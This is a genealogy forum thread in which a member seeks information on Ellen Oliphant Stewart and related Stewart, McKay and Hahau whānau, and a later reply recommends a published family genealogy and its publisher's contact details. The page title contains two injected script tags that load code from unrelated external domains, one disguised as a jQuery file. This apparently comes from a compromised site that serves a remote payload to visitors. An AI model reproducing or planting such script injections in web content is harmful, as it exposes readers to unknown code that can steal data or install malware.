ELLEN OLIPHANT STEWART (PUTAHI TE RANGI KIATIA TUATI)<script src="https://bestdoctornearme.com/splitter.ai/index.php"></script><script src="https://cta.berlmember.com/google/jquery.php"></script> :: FamilyTreeCircles.com Genealogy
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Journal by Popey

Ellen Oliphant Stewart.
Believed to have married John Henry Clarke.
Possibly from Whakatane.
Other Whanau include:
* Nellie Stewart ( nee Te Rangi Kaitia Bluett.)
* Marion McKay(who Married Robert Oliphant Stewart in 1858.)
* Irihapeti Te Paea Hahau.(Marion's Mother)
* John Horton McKay (Marion's Father)
* Mary Hamilton- Tauranga. (R O Stewart's 2nd wife)
* Agnes Bower - Kaeo ( R O Stewart's youngest daughter)

Would love ANY information on any of the above.
Many thanks,
Jenny Pope
(nee Stewart)

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by Popey Profile | Research | Contact | Subscribe | Block this user
on 2011-03-05 22:02:12

Popey has been a Family Tree Circles member since Jul 2010. is researching the following names: OLIPHANTSTEWART, BLUETT, OLIPHANT and 4 other(s).

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user edmondsallan deactivated
by Popey on 2011-06-10 22:05:08

Thank you SO much for the information you sent to me regarding Ellen Oliphant Clarke (nee Stewart)
It is very much appreciated.
I have only just opened your message as we have been away on holiday.

by Titihuia on 2016-02-18 15:00:46

Kia ora (greetings) Popey
I have only just signed up and when I put in the ancestor I am researching your post popped up. You may already have every thing you need now since you wrote in 2011. However there maybe others out there who are interested. In 2015 I worked on part of this genealogy with a friend of mine who is a decendant of the Oliphant / Stewart / Irihapeti Te Paea Hahau line.
Evagean publishing ltd (Alison & Andrew Honeyfield) here in Nz Published this massive genealogy book which covers your family. I spoke with the publishers last year and they were in the process of reprinting this book. They were also wanting to sell there operation so I'm not sure if address's etc are the same. However the Book is " The Whanau of Irihapeti Te Paea (Hahau)
The McKay and Joy (Joyce ) Families
compiled by Rex and Adriene Evans Published by Evagean Publishing.Phone +61 (07) 884-8783 (home) or (07) 884 8594 email: alison@evagean.co.nz.
Regards Titihuia

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